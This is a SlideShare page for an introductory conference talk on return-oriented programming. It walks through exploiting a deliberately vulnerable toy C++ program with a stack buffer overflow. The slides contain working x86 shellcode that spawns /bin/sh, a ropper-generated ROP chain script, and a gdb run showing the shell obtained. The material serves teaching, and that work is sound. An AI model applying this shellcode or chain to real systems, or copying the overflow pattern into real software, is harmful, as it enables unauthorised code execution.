KEMBAR78
Return Oriented Programming, an introduction | PDF
Patricia Aas, profile picture
Uploaded byPatricia Aas
170 views

Return Oriented Programming, an introduction

This document outlines an introduction to return-oriented programming (ROP) presented by Patricia Aas at NDC Security 2023, detailing the process of exploiting stack buffer overflows to execute arbitrary code. It includes code snippets for a missile launcher program that demonstrates vulnerabilities and provides insights into creating shellcode on x86 32-bit Linux architectures. The presentation highlights the technical aspects of writing and testing ROP chains, as well as executing system calls through shellcode.

Download to read offline
1 Turtle Sec @pati_gallardo Warning! This presentation has A LOT of assembly Run while you have the chance
2 Return Oriented Programming an introduction NDC Security 2023 Patricia Aas Turtle Sec
3 @pati_gallardo Patricia Aas - Trainer & Consultant C++ Programmer, Application Security Currently : TurtleSec Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science Pronouns: she/they Turtle Sec
4 @pati_gallardo Semi-Artisanal ROP
5 TurtleSec @pati_gallardo 1. void launch_missiles(int n) { 2. printf("Launching %d missilesn", n); 3. } 4. 5. void authenticate_and_launch() { 6. int n_missiles = 2; 7. bool allowaccess = false; 8. char response[110]; 9. printf("Secret: "); 10. std::cin >> response; 11. 12. if (strcmp(response, "Joshua") == 0) 13. allowaccess = true; 14. 15. if (allowaccess) { 16. puts("Access granted"); 17. launch_missiles(n_missiles); 18. } 19. 20. if (!allowaccess) 21. puts("Access denied"); 22. } 23. 24. int main() { 25. puts("WarGames MissileLauncher v0.1"); 26. authenticate_and_launch(); 27. puts("Operation complete"); 28. } target.cpp @olvemaudal @pati_gallardo The application
6 TurtleSec @pati_gallardo Secret: Access Granted Operation complete Launching missiles Access Denied “David” “Joshua” The Programmers Mental State Machine
7 TurtleSec @pati_gallardo target.cpp 1. void launch_missiles(int n) { 2. printf("Launching %d missilesn", n); 3. } 4. 5. void authenticate_and_launch() { 6. int n_missiles = 2; 7. bool allowaccess = false; 8. char response[110]; 9. printf("Secret: "); 10. std::cin >> response; 11. 12. if (strcmp(response, "Joshua") == 0) 13. allowaccess = true; 14. 15. if (allowaccess) { 16. puts("Access granted"); 17. launch_missiles(n_missiles); 18. } 19. 20. if (!allowaccess) 21. puts("Access denied"); 22. } 23. 24. int main() { 25. puts("WarGames MissileLauncher v0.1"); 26. authenticate_and_launch(); 27. puts("Operation complete"); 28. } The vulnerability Stack allocated buffer Stack Buffer Overflow @pati_gallardo
8 TurtleSec @pati_gallardo Secret: Access Granted Operation complete Launching missiles Access Denied “David” “Joshua” Weird State “globalthermonuclearwar” Terminate The Weird Machine (imagine a smaller buffer)
9 @pati_gallardo Our x86 32-bit shellcode for Linux
10 TurtleSec @pati_gallardo Shellcode Piece of code, typically in machine code, that is delivered and executed as a part of an exploit. Called “shellcode” because a traditional use was to start a shell, for example sh. In real exploits it will deliver some kind of mechanism for further (remote) compromise of the system.
11 TurtleSec @pati_gallardo Shellcode - code that gives you shell int execve(const char *filename, char *const argv[], char *const envp[]); Target Process Vulnerable Program Target Process /bin/sh Shellcode
12 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
13 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } Write C code for shellcode TurtleSec shellcode.c execve open close
14 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
15 TurtleSec @pati_gallardo $ gcc -Wno-incompatible-pointer-types -m32 -o shellcode shellcode.c $ ./shellcode $ Test C code for shellcode
16 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
17 TurtleSec @pati_gallardo ebx eax ax ah al 32 16 8 bx bh bl ecx cx ch cl edx dx dh dl x86 32-bit Linux syscall convention eax Syscall number ebx 1. argument ecx 2. argument edx 3. argument Registers
18 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c close
19 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x06 unsigned int fd close - calling convention 1. int fd = 0; 2. close(fd); Not in use
20 TurtleSec @pati_gallardo eax Syscall number 0x06 ebx 1. argument unsigned int fd close asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x06nt" // Set eax to syscall number (0x06) 3. "xor ebx, ebxnt" // Zero out ebx - file descriptor 4. "int 0x80nt" // Invoke syscall
21 TurtleSec @pati_gallardo 1. 2. 3. 4. mov eax, 0x06 xor ebx, ebx xor eax, eax eax 0x00 eax 0x06 ebx 0x00 Syscall Registers eax : Syscall number ebx : unsigned int fd int 0x80 close Register State Instructions
22 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c open
23 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x05 const char *filename int flags umode_t mode open - calling convention 1. const char *filename = "/dev/tty"; 2. int flag = O_RDONLY; 3. open(filename, flag);
24 TurtleSec @pati_gallardo esp sp stack pointer 32 16 Stack manipulation As instructions like push and pop are executed the stack pointer register (esp) is updated so it points to the "top of the stack"
25 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x05 const char *filename int flags umode_t mode open asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x05nt" // Set eax to syscall number (0x05) 3. "xor ebx, ebxnt" // Zero out 4. "push ebxnt" // Push null terminator 5. "mov ebx, 0x7974742fnt" // "ytt/" 6. "push ebxnt" // Part two of the string 7. "mov ebx, 0x7665642fnt" // "ved/" 8. "push ebxnt" // Part one of the string 9. "mov ebx, espnt" // Put pointer in ebx 10. "xor ecx, ecxnt" // Zero out 11. "xor edx, edxnt" // Zero out 12. "int 0x80nt" // Invoke syscall
26 TurtleSec @pati_gallardo 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. mov eax, 0x05 xor ebx, ebx push ebx mov ebx, 0x7974742f xor ecx, ecx mov ebx, esp push ebx mov ebx, 0x7665642f push ebx xor edx, edx xor eax, eax 0x00 0x00 0x00 0x00 0x79 y 0x74 t 0x74 t 0x2f / 0x76 v 0x65 e 0x64 d 0x2f / ecx 0x00 eax 0x00 eax 0x05 ebx 0x00000000 Stack Syscall Registers edx : umode_t mode eax : Syscall number ebx : const char *filename ecx : int flags int 0x80 ebx 0x7974742f ebx 0x7665642f ebx = esp ecx 0x00 O_RDONLY open
27 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c execve
28 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x0b const char *name const char *const *argv const char *const *envp execve - calling convention 1. const char *name = "/bin/sh"; 2. char *const *argv = NULL; 3. char *const *envp = NULL; 4. execve(name, argv, envp);
29 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x0b const char *name const char *const *argv const char *const *envp execve asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b) 3. "xor ebx, ebxnt" // Zero out 4. "push ebxnt" // Push null terminator 5. "mov ebx, 0x68732f2fnt" // "hs//" 6. "push ebxnt" // Part two of the string 7. "mov ebx, 0x6e69622fnt" // "nib/" 8. "push ebxnt" // Part one of the string 9. "mov ebx, espnt" // Put pointer in ebx 10. "xor ecx, ecxnt" // Zero out 11. "xor edx, edxnt" // Zero out 12. "int 0x80nt" // Invoke syscall
30 TurtleSec @pati_gallardo 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. mov eax, 0x0b xor ebx, ebx push ebx mov ebx, 0x68732f2f xor ecx, ecx mov ebx, esp push ebx mov ebx, 0x6e69622f push ebx xor edx, edx xor eax, eax 0x00 0x00 0x00 0x00 0x68 h 0x73 s 0x2f / 0x2f / 0x6e n 0x69 i 0x62 b 0x2f / ecx 0x00 eax 0x00 eax 0x0b ebx 0x00000000 Stack Syscall Registers edx : const char *const *envp eax : Syscall number ebx : const char *name ecx : const char *const *argv int 0x80 ebx 0x68732f2f ebx 0x6e69622f ebx = esp ecx 0x00 execve
31 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
32 TurtleSec @pati_gallardo 1. int main(void) { 2. __asm__( 3. ".intel_syntax noprefixnt" 4. "xor eax, eaxnt" // Zero out 5. "mov eax, 0x06nt" // Set eax to syscall number (0x06) 6. "xor ebx, ebxnt" // Zero out ebx - file descriptor 7. "int 0x80nt" // Invoke syscall 8. "xor eax, eaxnt" // Zero out 9. "mov eax, 0x05nt" // Set eax to syscall number (0x05) 10. "xor ebx, ebxnt" // Zero out 11. "push ebxnt" // Push null terminator 12. "mov ebx, 0x7974742fnt" // "ytt/" 13. "push ebxnt" // Part two of the string 14. "mov ebx, 0x7665642fnt" // "ved/" 15. "push ebxnt" // Part one of the string 16. "mov ebx, espnt" // Put pointer in ebx 17. "xor ecx, ecxnt" // Zero out 18. "xor edx, edxnt" // Zero out 19. "int 0x80nt" // Invoke syscall 20. "xor eax, eaxnt" // Zero out 21. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b) 22. "xor ebx, ebxnt" // Zero out 23. "push ebxnt" // Push null terminator 24. "mov ebx, 0x68732f2fnt" // "hs//" 25. "push ebxnt" // Part two of the string 26. "mov ebx, 0x6e69622fnt" // "nib/" 27. "push ebxnt" // Part one of the string 28. "mov ebx, espnt" // Put pointer in ebx 29. "xor ecx, ecxnt" // Zero out 30. "xor edx, edxnt" // Zero out 31. "int 0x80nt" // Invoke syscall 32. ); 33. } execve open close shellcode_asm.c @pati_gallardo
33 TurtleSec @pati_gallardo $ clang -m32 -o shellcode_asm shellcode_asm.c $ ./shellcode_asm $ Test asm code for shellcode
34 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
35 TurtleSec @pati_gallardo ROP Return Oriented Programming When your stack is not executable
36 TurtleSec @pati_gallardo Foundational idea: The ret instruction transfers execution to the (return) address located on the stack
37 TurtleSec @pati_gallardo <addr 1> <addr 1> eax stack ptr Stack Registers RX Memory Instruction ptr <addr 1> xor eax, eax; ret; 0x00000000 <addr 2> stack ptr A ret instruction is being executed 1. ret
38 TurtleSec @pati_gallardo Rest of Rop Chain Return address Stack allocated buffer The Stack Buffer Overflow Gadget 1 addr Gadget 2 addr Gadget 3 addr Gadget 4 addr Gadget 5 addr Gadget 6 addr RX Memory <instructions>; ret; [0] : PADDING [1] : PADDING [2] : PADDING [3] : PADDING [4] : Gadget 1 addr [5] : Gadget 2 addr [6] : Gadget 3 addr [7] : Gadget 4 addr [8] : Gadget 5 addr [9] : Gadget 6 addr <instructions>; ret; <instructions>; ret; <instructions>; ret; <instructions>; ret; <instructions>; ret; Stack at time of overflow
39 TurtleSec @pati_gallardo Put it all into the exploit string Padding ROP Chain Gadget 1 Gadget 3 Gadget 2 Gadget 5 Gadget 4 ROP Chain
40 TurtleSec @pati_gallardo 1. #!/usr/bin/env python2 2. from struct import pack 3. 4. rop = '' 5. rop += 'x90'*130 # Use pattern_create/offset 6. 7. # TODO : Put in ROP chain here 8. 9. print(rop) Print ROP Chain Padding rop_chain.py @pati_gallardo Script
41 TurtleSec Terminal $ ropper --file target --chain execve --badbytes 00090b20 [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] filtering badbytes... 100% [LOAD] removing double gadgets... 100% [INFO] ROPchain Generator for syscall execve: [INFO] write command into data section eax 0xb ebx address to cmd ecx address to null edx address to null [INFO] Try to create chain which fills registers without delete content of previous filled registers [*] Try permuation 1 / 24 [INFO] Look for syscall gadget [INFO] syscall gadget found [INFO] generating rop chain Using ropper to find create a ROP chain
42 Terminal TurtleSec #!/usr/bin/env python # Generated by ropper ropchain generator # from struct import pack p = lambda x : pack('I', x) IMAGE_BASE_0 = 0x08048000 # 14e751855dc7dea49f8c9c0e10a22363f36ee225cb9bfee3b663fa039ac8a9ea rebase_0 = lambda x : p(x + IMAGE_BASE_0) rop = '' [... ROP CHAIN ...] print(rop) [INFO] rop chain generated! Using ropper to find create a ROP chain
43 Terminal TurtleSec rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; rop += '//bi' rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; rop += rebase_0(0x001ca060) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret; rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; rop += 'n/sh' rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; rop += rebase_0(0x001ca064) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret; rop += rebase_0(0x0000ddf4) # 0x08055df4: xor eax, eax; ret; rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; rop += rebase_0(0x001ca068) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret; rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret; rop += rebase_0(0x001ca060) rop += rebase_0(0x00004c88) # 0x0804cc88: pop ecx; ret; rop += rebase_0(0x001ca068) rop += rebase_0(0x000f9715) # 0x08141715: pop edx; xor eax, eax; pop edi; ret; rop += rebase_0(0x001ca068) rop += p(0xdeadbeef) rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; rop += p(0xfffffff5) rop += rebase_0(0x000df9d3) # 0x081279d3: neg eax; ret; rop += rebase_0(0x00113f80) # 0x0815bf80: int 0x80; ret; The ROP Chain 1 2 3 4 5 7 6 8 9
44 TurtleSec @pati_gallardo 1. 0x000ae1aa 2. 0x000a2c66 3. 0x0001730c 4. 0x08055df4 5. 0x0000101e 6. 0x00004c88 7. 0x000f9715 8. 0x000df9d3 9. 0x00113f80 pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; pop ecx; ret; int 0x80; ret; neg eax; ret; pop edx; xor eax, eax; pop edi; ret; pop eax; ret; ROP chain gadgets pop ebx; ret;
45 TurtleSec @pati_gallardo 0x000ae1aa 0x000a2c66 0x0001730c pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; pop eax; ret; 0x0001730c 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x001ca060 0x000a2c66 '//bi' 0x000ae1aa eax ebx edx esi edi ebp stack ptr '//bi' stack ptr 0x001ca060 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x000ae1aa 0x000a2c66 0x0001730c
46 TurtleSec @pati_gallardo 0x000ae1aa 0x000a2c66 0x0001730c pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; pop eax; ret; 0x0001730c 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x001ca064 0x000a2c66 'n/sh' 0x000ae1aa eax ebx edx esi edi ebp stack ptr 'n/sh' stack ptr 0x001ca064 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x000ae1aa 0x000a2c66 0x0001730c 'n/sh'
47 TurtleSec @pati_gallardo 0x0000ddf4 0x000a2c66 0x0001730c pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; 0x0001730c 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x001ca068 0x000a2c66 0x0000ddf4 eax ebx edx esi edi ebp stack ptr 0x00000000 stack ptr 0x001ca068 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x0000ddf4 0x000a2c66 0x0001730c 'n/sh' 0x00000000
48 TurtleSec @pati_gallardo 0x0000101e 0x00004c88 0x000f9715 0x000ae1aa 0x000df9d3 0x000df9d3 0xfffffff5 0x000ae1aa 0xdeadbeef 0x001ca068 0x000f9715 0x001ca068 0x00004c88 0x0000101e eax ebx ecx edx edi stack ptr stack ptr stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x0000101e 0x00004c88 0x000f9715 'n/sh' pop ebx; ret; pop ecx; ret; pop edx; xor eax, eax; pop edi; ret; pop eax; ret; neg eax; ret; 0x001ca068 0x001ca068 0xdeadbeef stack ptr 0x000ae1aa 0xfffffff5 stack ptr 0x000df9d3 0x00000000 0x001ca060 0x0b 0x001ca060
49 TurtleSec @pati_gallardo 0x00113f80 0x00113f80 eax ebx ecx edx stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x00113f80 'n/sh' int 0x80; ret; 0x00000000 0x001ca068 0x001ca068 0xfffffff5 0x00000000 0x001ca060 0x0b Syscall Registers edx : const char *const *envp eax : Syscall number ebx : const char *name ecx : const char *const *argv
50 @pati_gallardo Finding Gadgets
51 TurtleSec @pati_gallardo 1. 0x000ae1aa 8. 0x000df9d3 9. 0x00113f80 close gadgets pop eax; ret; neg eax; ret; int 0x80; ret; 1. # 1. Zero out ebx 2. # TODO 3. 4. # 2. Put value in eax ( -0xfa = 0x06 ) 5. rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; 6. rop += p(0xfffffffa) 7. 8. # 3. Negate value in eax 9. rop += rebase_0(0x000df9d3) # 0x081279d3: neg eax; ret; 10. 11. # 4. Syscall 12. rop += rebase_0(0x00113f80) # 0x0815bf80: int 0x80; ret; Missing: xor ebx, ebx; ret; Syscall Registers eax : Syscall number ebx : unsigned int fd
52 TurtleSec @pati_gallardo 1. 0x000ae1aa 2. 0x000a2c66 3. 0x0001730c 4. 0x08055df4 5. 0x0000101e 8. 0x000df9d3 9. 0x00113f80 pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; int 0x80; ret; neg eax; ret; pop eax; ret; open gadgets pop ebx; ret; 1. # 11. Zero out ecx 2. # TODO 3. 4. # 12. Zero out edx 5. # TODO Missing: xor ecx, ecx; ret; Missing: xor edx, edx; ret;
53 TurtleSec @pati_gallardo 1. 0x000ae1aa 2. 0x000a2c66 3. 0x0001730c 4. 0x08055df4 5. 0x0000101e 6. 0x00004c88 7. 0x000f9715 8. 0x000df9d3 9. 0x00113f80 pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; pop ecx; ret; int 0x80; ret; neg eax; ret; pop edx; xor eax, eax; pop edi; ret; pop eax; ret; execve gadgets (from gen ROP chain) pop ebx; ret;
54 TurtleSec @pati_gallardo Missing 3 gadgets xor ebx, ebx; ret; xor ecx, ecx; ret; xor edx, edx; ret;
55 Terminal TurtleSec $ ropper --file target --search "xor ebx, ebx" [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% [INFO] Searching for gadgets: xor ebx, ebx [INFO] File: target 0x0811e009: xor ebx, ebx; jmp edx; 0x080ee378: xor ebx, ebx; mov eax, ebx; pop ebx; pop esi; pop edi; ret; 0x0815b675: xor ebx, ebx; mov eax, ecx; int 0x80; 0x080f8a7e: xor ebx, ebx; mov eax, edx; int 0x80; 0x0816abcb: xor ebx, ebx; mov esi, 8; mov dword ptr [esp + 0xc], edx; mov eax, 0xaf; lea ecx, [ecx - 0x5c874]; call dword ptr gs:[0x10]; 0x080b4fce: xor ebx, ebx; movsx eax, al; pop ecx; push eax; push esi; call dword ptr [edx + 8]; 0x08168060: xor ebx, ebx; movzx eax, byte ptr [edi + eax - 0x20]; mov edi, dword ptr [esp + 0xc]; mov eax, dword ptr [edi + eax*4 - 0x4554]; jmp eax; 0x081680ac: xor ebx, ebx; movzx eax, byte ptr [edx + eax - 0x20]; mov eax, dword ptr [edi + eax*4 - 0x4554]; jmp eax; 0x0807466c: xor ebx, ebx; push eax; push edi; call dword ptr [edx + 8]; 0x080d5b4d: xor ebx, ebx; push ecx; call dword ptr [eax + 0x18]; 0x0808a868: xor ebx, ebx; push edx; push edi; call dword ptr [eax + 0x18]; 0x0804cc9a: xor ebx, ebx; ret;
56 TurtleSec @pati_gallardo All 3 are present in the binary xor ebx, ebx; ret; xor ecx, ecx; ret; xor edx, edx; ret; 0x0804cc9a 0x0804ccad 0x0804ccc0
57 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
58 $ hello Terminal TurtleSec $ ./rop_chain.py > rop_chain_file $ gdb -q target Reading symbols from target... (gdb) r < rop_chain_file Starting program: target < advanced_ropper_file WarGames MissileLauncher v0.1 Secret: Access granted Launching -1869574000 missiles Access denied process 3279834 is executing new program: /usr/bin/dash [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". $ Test ROP Chain
59 @pati_gallardo We go shel ! Than Yo !
60 @pati_gallardo Questions? Photos from pixabay.com Patricia Aas, TurtleSec Turtle Sec
61 Turtle Sec @pati_gallardo I'm "sorry" <3

More Related Content

PDF
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
byPatricia Aas
 
PDF
Shellcode Disassembling - Reverse Engineering
bySumutiu Marius
 
PDF
Linux Shellcode disassembling
byHarsh Daftary
 
PDF
Shellcoding in linux
byAjin Abraham
 
PDF
CNIT 127 Ch 3: Shellcode
bySam Bowne
 
PDF
CNIT 127 Ch 3: Shellcode
bySam Bowne
 
PDF
CNIT 127 Ch 3: Shellcode
bySam Bowne
 
PDF
CNIT 127 Ch 3: Shellcode
bySam Bowne
 
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
byPatricia Aas
 
Shellcode Disassembling - Reverse Engineering
bySumutiu Marius
 
Linux Shellcode disassembling
byHarsh Daftary
 
Shellcoding in linux
byAjin Abraham
 
CNIT 127 Ch 3: Shellcode
bySam Bowne
 
CNIT 127 Ch 3: Shellcode
bySam Bowne
 
CNIT 127 Ch 3: Shellcode
bySam Bowne
 
CNIT 127 Ch 3: Shellcode
bySam Bowne
 

Similar to Return Oriented Programming, an introduction

PDF
CNIT 127: Ch 3: Shellcode
bySam Bowne
 
PDF
TDOH x 台科 pwn課程
byWeber Tsai
 
PDF
CNIT 127: 3: Shellcode
bySam Bowne
 
PPTX
Tranning-2
byAli Hussain
 
ODP
null Pune meet - Application Security: Code injection
byn|u - The Open Security Community
 
PDF
Unix executable buffer overflow
byAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
PDF
N_Asm Assembly system calls (sol)
bySelomon birhane
 
PDF
X86 assembly nasm syntax
byFrancesco DiFusco
 
PPTX
Software to the slaughter
byQuinn Wilton
 
ODP
Code Red Security
byAmr Ali
 
PDF
Dive into exploit development
byPayampardaz
 
PDF
Software Vulnerabilities in C and C++ (CppCon 2018)
byPatricia Aas
 
PDF
Shellcoding, an Introduction
byDaniele Bellavista
 
PPT
1. Von Neumann + Booting Sequence + System Calls.ppt
bymuhammadtaharazzaq
 
PPTX
Steelcon 2014 - Process Injection with Python
byinfodox
 
PDF
Rootkit on linux_x86_v2.6
byscuhurricane
 
PPTX
Load-time Hacking using LD_PRELOAD
byDharmalingam Ganesan
 
PDF
Buffer overflow tutorial
byhughpearse
 
PDF
Rootkit on Linux X86 v2.6
byfisher.w.y
 
PDF
The Stack and Buffer Overflows
byUTD Computer Security Group
 
CNIT 127: Ch 3: Shellcode
bySam Bowne
 
TDOH x 台科 pwn課程
byWeber Tsai
 
CNIT 127: 3: Shellcode
bySam Bowne
 
Tranning-2
byAli Hussain
 
null Pune meet - Application Security: Code injection
byn|u - The Open Security Community
 
Unix executable buffer overflow
byAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
N_Asm Assembly system calls (sol)
bySelomon birhane
 
X86 assembly nasm syntax
byFrancesco DiFusco
 
Software to the slaughter
byQuinn Wilton
 
Code Red Security
byAmr Ali
 
Dive into exploit development
byPayampardaz
 
Software Vulnerabilities in C and C++ (CppCon 2018)
byPatricia Aas
 
Shellcoding, an Introduction
byDaniele Bellavista
 
1. Von Neumann + Booting Sequence + System Calls.ppt
bymuhammadtaharazzaq
 
Steelcon 2014 - Process Injection with Python
byinfodox
 
Rootkit on linux_x86_v2.6
byscuhurricane
 
Load-time Hacking using LD_PRELOAD
byDharmalingam Ganesan
 
Buffer overflow tutorial
byhughpearse
 
Rootkit on Linux X86 v2.6
byfisher.w.y
 
The Stack and Buffer Overflows
byUTD Computer Security Group
 

More from Patricia Aas

PDF
The fundamental misunderstanding in Team Topologies
byPatricia Aas
 
PDF
Telling a story
byPatricia Aas
 
PDF
I can't work like this (KDE Academy Keynote 2021)
byPatricia Aas
 
PDF
Dependency Management in C++ (NDC TechTown 2021)
byPatricia Aas
 
PDF
Introduction to Memory Exploitation (Meeting C++ 2021)
byPatricia Aas
 
PDF
Classic Vulnerabilities (MUCplusplus2022).pdf
byPatricia Aas
 
PDF
Classic Vulnerabilities (ACCU Keynote 2022)
byPatricia Aas
 
PDF
Introduction to Memory Exploitation (CppEurope 2021)
byPatricia Aas
 
PDF
Thoughts On Learning A New Programming Language
byPatricia Aas
 
PDF
Trying to build an Open Source browser in 2020
byPatricia Aas
 
PDF
Trying to build an Open Source browser in 2020
byPatricia Aas
 
PDF
DevSecOps for Developers, How To Start (ETC 2020)
byPatricia Aas
 
PDF
The Anatomy of an Exploit (NDC TechTown 2019)
byPatricia Aas
 
PDF
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
byPatricia Aas
 
PDF
The Anatomy of an Exploit (NDC TechTown 2019))
byPatricia Aas
 
PDF
Elections, Trust and Critical Infrastructure (NDC TechTown)
byPatricia Aas
 
PDF
Survival Tips for Women in Tech (JavaZone 2019)
byPatricia Aas
 
PDF
Embedded Ethics (EuroBSDcon 2019)
byPatricia Aas
 
PDF
Chromium Sandbox on Linux (NDC Security 2019)
byPatricia Aas
 
PDF
Keynote: Deconstructing Privilege (C++ on Sea 2019)
byPatricia Aas
 
The fundamental misunderstanding in Team Topologies
byPatricia Aas
 
Telling a story
byPatricia Aas
 
I can't work like this (KDE Academy Keynote 2021)
byPatricia Aas
 
Dependency Management in C++ (NDC TechTown 2021)
byPatricia Aas
 
Introduction to Memory Exploitation (Meeting C++ 2021)
byPatricia Aas
 
Classic Vulnerabilities (MUCplusplus2022).pdf
byPatricia Aas
 
Classic Vulnerabilities (ACCU Keynote 2022)
byPatricia Aas
 
Introduction to Memory Exploitation (CppEurope 2021)
byPatricia Aas
 
Thoughts On Learning A New Programming Language
byPatricia Aas
 
Trying to build an Open Source browser in 2020
byPatricia Aas
 
Trying to build an Open Source browser in 2020
byPatricia Aas
 
DevSecOps for Developers, How To Start (ETC 2020)
byPatricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019)
byPatricia Aas
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
byPatricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019))
byPatricia Aas
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
byPatricia Aas
 
Survival Tips for Women in Tech (JavaZone 2019)
byPatricia Aas
 
Embedded Ethics (EuroBSDcon 2019)
byPatricia Aas
 
Chromium Sandbox on Linux (NDC Security 2019)
byPatricia Aas
 
Keynote: Deconstructing Privilege (C++ on Sea 2019)
byPatricia Aas
 

Recently uploaded

PPTX
Safe Confined Space Entry Monitoring_ Singapore Experts.pptx
byprasadexiga0
 
PPTX
Java Modern Puzzlers, a guide to new programming features
bySimon Ritter
 
PDF
Privacy-first in-browser Generative AI web apps: offline-ready, future-proof,...
byMaxim Salnikov
 
PDF
VADY Data Analytics Solutions – Effortless AI-Powered Decision-Making for Eve...
byNewFangledVision
 
PDF
Safe Confined Space Entry Monitoring_ Singapore Experts.pdf
byprasadexiga0
 
PDF
The new Volto Form Block, Plone Conference 2025
byRob Gietema
